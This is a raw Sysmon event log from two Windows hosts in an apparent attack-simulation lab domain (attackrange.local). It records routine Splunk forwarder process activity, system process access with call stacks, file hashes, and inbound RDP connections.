10341000x8000000000000000977713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8993-6151-A079-00000000FD01}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8993-6151-A079-00000000FD01}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.987{69CF5F33-8993-6151-A079-00000000FD01}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:29.360{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38545C711ACCF25C5B5A86F9C2D17D90,SHA256=2A11164D6F97FA9EFBEC7709C018B795F94ACFA6DED54DA62B0CE615862BB7A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.580{69CF5F33-8995-6151-A279-00000000FD01}24841888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.549{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CA2B257738FB8008CAAF6EC13B0785,SHA256=56FE091F200049184EA7C4355D2671A9B3BB3BB76AD2517F6A3BB4FBAE6E8AF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.393{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8995-6151-A279-00000000FD01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8995-6151-A279-00000000FD01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8995-6151-A279-00000000FD01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.024{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-62304-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000977743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.377{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:29.363{69CF5F33-8995-6151-A279-00000000FD01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:28.530{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63259-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:30.521{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11BF5C2FF787B9F642223D5B3C72FD46,SHA256=E705458558296D1DF0EA11D88E7D89E8063FF889E35E40560FC9A6C812A129E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:30.490{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FC1E0783BAADAA6B62957B5F7A0399,SHA256=C5916C5C0E659DEA5669AAE08E477280FD4075B4B41F05ED6AB7015753F43544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:30.549{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2E635BCDBEFE9EF2E9EE70C3516CD15,SHA256=45E5DD990C5FDF2E578F7899A63D4B8820AE0F7638EE6EF5ABD58BA3FF8D6623,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.838{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-36849-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.791{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62842-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.771{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59318-false10.0.1.12-8000- 23542300x8000000000000000977755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:30.236{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17BD46A3A5B090B216CEC1D23B781DAF,SHA256=7F8A554622E3EA806B155A99C92A58189104FE4992157A176E95A64A8C59EF9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:31.892{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30A723D826F97579FE82F130574331B6,SHA256=5CDBAB10B1269ABB5257A7C8F9A8A78FC2F534847E2D5F7624824465AAE66E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:31.752{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6066AD699E1E72C2646746D2153AE62,SHA256=D01BD822C236926B03C5D9DB376008473BF9F0E5DCDC4C63EEC93F68B4E94894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:31.491{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E18954C72847533ABAE8FDFE1B6E1655,SHA256=1722B7B516A2ADF53ED99B030B3427EC25164B104D6CA055B6434C74285519B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:32.752{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE295AB57FF70467D8FB968EEE7736E,SHA256=B96D96124C7580E8A971A9D15D07B4C14487E7B799D279A0E0065D295B6A6344,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:32.776{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9575C6627D8679D0D1B15BF995F98085,SHA256=81CB566A1E58B611A843ABD0727E8B8BE53D51CCD3E56181F5D051D053BE4A47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:31.168{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64097-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:30.799{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53284-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 